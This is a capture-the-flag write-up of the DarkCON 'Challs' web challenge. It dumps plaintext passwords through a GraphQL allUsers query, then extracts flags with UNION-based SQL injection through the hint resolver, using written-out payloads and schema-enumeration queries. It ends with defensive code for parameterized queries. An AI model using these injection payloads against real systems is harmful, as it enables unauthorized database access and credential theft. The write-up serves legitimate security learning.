Here is the authentication process. GraphQL is in use, so I start with the usual extraction of the client-side code.

    function auth() {
        var username = document.getElementById("Username").value;
        var password = document.getElementById("Password").value;
        var head = btoa(username + ':' + password);  // base64 of "username:password", kept client-side
        $(document).ready(function() {
            $.post("graphql", {
                "query": "mutation{login(username:\"" + username + "\",password:\"" + password + "\")}"
            }, function(data, textStatus) {
                if (data.data.login == "Success") {
                    document.cookie = "auth=" + head;  // the session cookie is just base64(username:password)
                    window.location = '/dashboard'
                } else {
                    alert('Wrong creds')
                };
            }, "json");
        });
    }
    function yeet() {
        document.cookie = "auth=Z3Vlc3Q6a2FybWE5ODc0";  // base64 of "guest:karma9874"
        window.location = "/dashboard"
    }
mutation{login(username:"admin",password:"password")}

query{Challs{}} -> Authorization Error

query{allUsers{username password}} -> {"data":{"allUsers":[{"username":"guest","password":"karma9874"},{"username":"admin","password":"is_this_visible_to_you?"}]}}

ok.

That gave me the admin password, so let's try logging in. Admin privileges obtained, so back to working the GraphQL API.
query{Challs{id title flag{chall_flag}}} -> {"id":"35","title":"DarkCON Challs","flag":{"chall_flag":"<REDACTED>"}

Try Harder, huh...
query{Challs{id title description category author points flag{chall_id chall_title chall_flag}}} -> {"id":"35","title":"DarkCON Challs","description":"\"A place where you can see all the challs of darkCON CTF using api but not the flag or can you @_@ ?\r\nPS :- Try to get the flag of this chall xD\"","category":"Web","author":"Karma","points":500,"flag":{"chall_id":"35","chall_title":"DarkCON Challs","chall_flag":"<REDACTED>"}}

Hmm...

query{hint(chall_id:"35"){chall_id chall_title take_hint}} -> nothing in particular...

Wait, SQLi?
query{hint(chall_id:"x"){chall_id chall_title take_hint}} -> ER_BAD_FIELD_ERROR: Unknown column 'x' in 'where clause'

query{hint(chall_id:"'"){chall_id chall_title take_hint}} -> ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Here we go.

query{hint(chall_id:"-1 union select 1,2,3"){chall_id chall_title take_hint}}

Now the output is 1,2,3, so the column count is three. OK
query{hint(chall_id:"-1 union SELECT GROUP_CONCAT(distinct TABLE_SCHEMA),2,3 FROM INFORMATION_SCHEMA.TABLES"){chall_id chall_title take_hint}} -> darkcon,information_schema,mysql,performance_schema,sys

query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct table_name),2,3 from information_schema.tables where TABLE_SCHEMA='darkcon'"){chall_id chall_title take_hint}} -> challs,flags,hints,users

query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='challs'"){chall_id chall_title take_hint}} -> challs: id,category,title,description,author,points

query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='flags'"){chall_id chall_title take_hint}} -> flags: chall_id,chall_title,chall_flag

query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct chall_flag),2,3 from flags"){chall_id chall_title take_hint}} -> darkCON{fake_flag},darkCON{w0ww_y0u_re411y_f0und_m3}

Couldn't submit it, but this has to be right. ok. darkCON{w0ww_y0u_re411y_f0und_m3}
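For the record, here is what the two server-side bugs look like from the fixing side. This is an added example of my own, not the challenge's code: the hint resolver evidently concatenates chall_id into the WHERE clause, and allUsers hands back the password column. Function names and the stand-in db object are assumptions.

```javascript
// Added example (not the challenge's own code): the concatenating hint
// resolver that produced the errors above, next to a parameterized version.
// Function names and the stand-in "db" are assumptions for illustration.

// Vulnerable pattern: the GraphQL argument is pasted into the SQL text, so
// chall_id:"'" gives ER_PARSE_ERROR and chall_id:"-1 union select ..." adds
// a second SELECT to the statement.
function hintQueryVulnerable(challId) {
  return "SELECT chall_id, chall_title, take_hint FROM hints WHERE chall_id=" + challId;
}

// Parameterized pattern (mysql / mysql2 style "?" placeholder): the SQL text
// is fixed and the argument is sent separately as a bound value, so the same
// payload is just a string compared against chall_id and matches nothing.
function hintQuerySafe(challId) {
  return {
    sql: "SELECT chall_id, chall_title, take_hint FROM hints WHERE chall_id=?",
    params: [String(challId)],
  };
}

// Extra check for this schema: chall_id is an integer, so anything that is
// not all digits is rejected before it reaches the database.
function isValidChallId(challId) {
  return /^\d+$/.test(String(challId));
}

// Stand-in for a database driver: records SQL text and bound params so the
// resolver can be exercised without a MySQL instance.
const db = { log: [], query(sql, params = []) { this.log.push({ sql, params }); return []; } };

// Hardened resolver: validate, then always go through the parameterized form.
function resolveHint(challId) {
  if (!isValidChallId(challId)) throw new Error("chall_id must be numeric");
  const q = hintQuerySafe(challId);
  return db.query(q.sql, q.params);
}

// Second defect: allUsers{username password} returned stored passwords.
// Drop the password field before a user row leaves the resolver.
function publicUser(row) {
  const { password, ...rest } = row;  // password deliberately discarded
  return rest;
}
```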